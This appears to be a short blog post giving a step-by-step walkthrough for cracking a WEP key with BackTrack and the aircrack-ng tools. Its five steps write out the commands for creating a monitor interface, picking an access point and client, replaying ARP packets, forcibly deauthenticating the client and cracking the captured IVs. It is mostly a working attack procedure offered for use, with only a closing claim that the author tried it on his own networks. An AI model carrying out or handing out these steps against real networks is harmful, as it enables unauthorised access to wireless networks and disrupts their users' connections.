I suppose there’s probably a slew of other documents detailing…or summarizing…how to crack a WEP key with BackTrack. That’s fine. I’ll probably link to some later.

I’m assuming whomever reading this already knows about atheros devices. I’m assuming a lot of other things too and I’m not one to detail the primer; plenty of linux help out there on google.

Concepts

1. Create monitoring interface.
2. Select a target.
3. Capture ARP for a replay attack.
4. Attack the client; force deauthorization and replay.
5. Crack it.

Step Through Summary

1. Created the monitoring interface using the command airmon-ng start wifi0. This created an interface ath1 which I then used for the rest of the process.
2. Using airodump I located an Access Point and chose a target associated. airodump-ng ath1 Found an AP/client pair on channel 1 and decided to pursue it using the command airodump-ng -w target1_datetime -c 1 –ivs ath1. (–ivs switch used for cracking…I recommend reading manpages [airodump-ng, ivstools, makeivs] dumpfile is required when using –ivs)
3. Grabbing the AP/client MAC mapping I’m going to try to capture IVs aireplay-ng -3 -b {APMAC} -h {CLIENTMAC} ath1. Stepping into it…
4. I want to deauth the target to capture ARP and replay when I get it. aireplay-ng -0 -2 -a {APMAC} -c {CLIENTMAC} ath1. (research the syntax. deauth(0) twice(2). I’d imagine anything much higher and you risk losing heartbeat)
5. I collected IVs over the course of a minute so I decided to try cracking it. aircrack-ng target1_datetime Wasn’t long enough…So I tried about 5 minutes. Cracked the key.

I recommend more reading on PCAP and the tools used. Also some interesting things could be done with netcat…

Google similar documents: “Backtrack 3 + cracking WEP”

I only used this on my own networks…